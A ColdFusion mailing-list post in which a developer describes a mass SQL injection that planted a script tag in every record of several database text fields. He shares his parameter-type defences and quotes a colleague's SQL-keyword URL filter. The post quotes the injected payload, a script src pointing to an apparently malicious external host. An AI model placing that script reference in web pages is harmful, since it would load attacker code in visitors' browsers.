> The attack appends JavaScript to character fields.
Hi. Just checking in here on SQL injection -- I am a self-taught self-employed CF programmer, been doing this for quite a while, but there is a ton I don't know. And I have been hit by this current wave of injection So, my SQL Server 2005 database doesn't just get one record injected. It's every record in a particular field, all containing (in this attack) this code script src="http://jjmaoduo.3322.org/csrss/w.js"; and a few more things in html I didn't include What I have done to protect about 15 CF sites -- is simply require that integer values be integers -- by cfincluding a list of params like this, from application.cfm: ><CFIF IsDefined("groupid")> ><CFPARAM NAME="groupid" TYPE="integer"> ></CFIF> ><CFIF IsDefined("login")> ><CFPARAM NAME="login" TYPE="integer"> ></CFIF> ><CFIF IsDefined("sg")> ><CFPARAM NAME="sg" TYPE="integer"> ></CFIF> ><CFIF IsDefined("messageid")> ><CFPARAM NAME="messageid" TYPE="integer"> ></CFIF> ><CFIF IsDefined("msg")> ><CFPARAM NAME="msg" TYPE="integer"> ></CFIF> So, this text script has been injected into every record in about five fields in my users table -- and also into a variety of other tables in the same way: every record in that table, in some selected fields. All these injected fields are text fields -- URLs, addresses, Can this be done through a URL? Does the list of fields that have been injected provide any clue about how or where the injection attack occurred? How do these guys, or their program, know my table names and my field names? I have some very obscure field names, and they still get them injected - they are not guessing these things, they know the name of the field. If I wanted to duplicate what they did, I would write a loop that would go through every record in the table, and CFUPDATE that particular record. In fact, I wrote scripts like this to remove this junk, setting the record back to what it was before the injection. How do they do this? Anyway, got my hands full. Any thoughts on this would be great. And yes, I'd like to see the URL "loop" script that was offered by Justin Scott >Actually, with this particular SQL injection attack it's really easy >to stop. We created a SQL filter that is called from >application.cfm. It loops through the URL structure and checks to >see if any URL variables contain both a semi-colon and any SQL >keyword. If a match is found, it just cfaborts the request and >sends us an e-mail with the details. We periodically review those >messages and have not found a single false-positive yet after >deployment to every site we manage. Granted, it will not stop SQL >injection through form posts, but I don't recall ever seeing a SQL >injection attack through a form post (yet). At the least it can put >an immediate stop to the current flood and give you time to >implement other protective measures such as cfqueryparam, etc. We >have CF5 and CFMX versions if anyone wants a copy. Bruce Schuman Santa Barbara CA http://originresearch.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310387 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
